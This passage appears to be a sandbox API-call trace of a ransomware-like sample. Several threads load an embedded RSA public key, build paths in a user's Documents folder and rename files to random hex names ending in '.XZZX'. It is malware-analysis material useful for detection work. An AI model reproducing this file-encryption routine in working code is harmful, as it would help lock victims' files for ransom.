[0177.695] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.695] lstrcpyW (in: lpString1=0x2aaf460, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0177.695] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0177.695] SetErrorMode (uMode=0x1) returned 0x1 [0177.695] lstrcpyW (in: lpString1=0x2aaf860, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0177.695] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x678e1ac, Data2=0xa4a1, Data3=0x49ac, Data4=([0]=0x86, [1]=0xed, [2]=0xb8, [3]=0x51, [4]=0xee, [5]=0x24, [6]=0xb1, [7]=0xfc))) returned 0x0 [0177.695] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\0FE24CF432281F2497377D743655036C.XZZX") returned 118 [0177.695] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0177.695] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\82981D2C2F60852C0678E1AC320B6974.XZZX") returned 118 [0177.695] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 631 os_tid = 0x24c [0177.847] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0177.847] lstrcpyW (in: lpString1=0x2aaf460, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0177.847] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0177.847] SetErrorMode (uMode=0x1) returned 0x1 [0177.847] lstrcpyW (in: lpString1=0x2aaf860, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0177.847] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x716e79ee, Data2=0x4cd5, Data3=0x4a0b, Data4=([0]=0x9e, [1]=0xf1, [2]=0x16, [3]=0x5d, [4]=0x55, [5]=0x74, [6]=0xfb, [7]=0x61))) returned 0x0 [0177.847] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned 118 [0177.847] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0177.847] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\2D1E1B061638DF27716E79EE18E3C36F.XZZX") returned 118 [0177.847] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 632 os_tid = 0x398 [0178.003] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.003] lstrcpyW (in: lpString1=0x2aaf460, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0178.003] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.003] SetErrorMode (uMode=0x1) returned 0x1 [0178.003] lstrcpyW (in: lpString1=0x2aaf860, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0178.003] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xdc9b354e, Data2=0xe5ee, Data3=0x4ad7, Data4=([0]=0x8b, [1]=0x88, [2]=0xb6, [3]=0x16, [4]=0xd, [5]=0x5a, [6]=0x4b, [7]=0x40))) returned 0x0 [0178.003] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned 118 [0178.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.003] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\EEFA54844337E6E2DC9B354E45E2CB2A.XZZX") returned 118 [0178.003] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 633 os_tid = 0x248 [0178.160] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.160] lstrcpyW (in: lpString1=0x2aaf460, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0178.160] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.160] SetErrorMode (uMode=0x1) returned 0x1 [0178.160] lstrcpyW (in: lpString1=0x2aaf860, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0178.161] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xaedc0d11, Data2=0xd3dd, Data3=0x4fc0, Data4=([0]=0xa7, [1]=0xb2, [2]=0x3a, [3]=0x74, [4]=0xa4, [5]=0x0, [6]=0x32, [7]=0xd0))) returned 0x0 [0178.161] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\632A4073379A2FDC09389DEB3BC71424.XZZX") returned 118 [0178.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.161] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\52BC4AAD420018C0AEDC0D1144AAFD08.XZZX") returned 118 [0178.161] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 634 os_tid = 0xa3c [0178.314] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.314] lstrcpyW (in: lpString1=0x2aaf460, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0178.314] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.314] SetErrorMode (uMode=0x1) returned 0x1 [0178.314] lstrcpyW (in: lpString1=0x2aaf860, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0178.314] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0xd5b36156, Data2=0x8374, Data3=0x4b79, Data4=([0]=0xa0, [1]=0x8d, [2]=0x4b, [3]=0x38, [4]=0x72, [5]=0xed, [6]=0xa5, [7]=0xaf))) returned 0x0 [0178.314] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned 118 [0178.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.314] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\A0171CF826C11DD4D5B36156296C021C.XZZX") returned 118 [0178.314] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 635 os_tid = 0xa2c [0178.470] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.470] lstrcpyW (in: lpString1=0x2aaf460, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0178.470] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.470] SetErrorMode (uMode=0x1) returned 0x1 [0178.470] lstrcpyW (in: lpString1=0x2aaf860, lpString2="73C0D9902A7964C0808D031B2E914908.XZZX" | out: lpString1="73C0D9902A7964C0808D031B2E914908.XZZX") returned="73C0D9902A7964C0808D031B2E914908.XZZX" [0178.470] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x1c98b7fd, Data2=0x2b7a, Data3=0x47fd, Data4=([0]=0x89, [1]=0xa9, [2]=0xf2, [3]=0x2, [4]=0xb1, [5]=0x51, [6]=0x9b, [7]=0x2d))) returned 0x0 [0178.471] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\73C0D9902A7964C0808D031B2E914908.XZZX") returned 118 [0178.471] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.471] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\47AF2D920C39CD921C98B7FD0EE4B1DA.XZZX") returned 118 [0178.471] StrStrW (lpFirst="73C0D9902A7964C0808D031B2E914908.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 636 os_tid = 0x180 [0178.627] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.627] lstrcpyW (in: lpString1=0x2aaf460, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0178.627] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0178.627] SetErrorMode (uMode=0x1) returned 0x1 [0178.627] lstrcpyW (in: lpString1=0x2aaf860, lpString2="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" | out: lpString1="7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned="7D60B7A8152CECB0B780C8B61944D0F8.XZZX" [0178.627] CoCreateGuid (in: pguid=0x2aae440 | out: pguid=0x2aae440*(Data1=0x4a95cdd, Data2=0xf2b6, Data3=0x4307, Data4=([0]=0xb3, [1]=0x4b, [2]=0xef, [3]=0x68, [4]=0x2c, [5]=0x10, [6]=0xdc, [7]=0x58))) returned 0x0 [0178.627] wsprintfW (in: param_1=0x2aaec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\7D60B7A8152CECB0B780C8B61944D0F8.XZZX") returned 118 [0178.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2aafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0178.627] wsprintfW (in: param_1=0x2aae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\6A30EF1E3F8C44FA04A95CDD42372942.XZZX") returned 118 [0178.627] StrStrW (lpFirst="7D60B7A8152CECB0B780C8B61944D0F8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 637 os_tid = 0xa20 [0178.783] lstrcpyA (in: lpString1=0x2aafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0178.783] lstrcpyW (in: lpString1=0x2aaf460, lpString2="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" | out: lpString1="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX") returned="DE6D908A0693B67D2F37324A0AAB9AC5.XZZX" [0178.783] lstrcpyW (in: lpString1=0x2aae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS 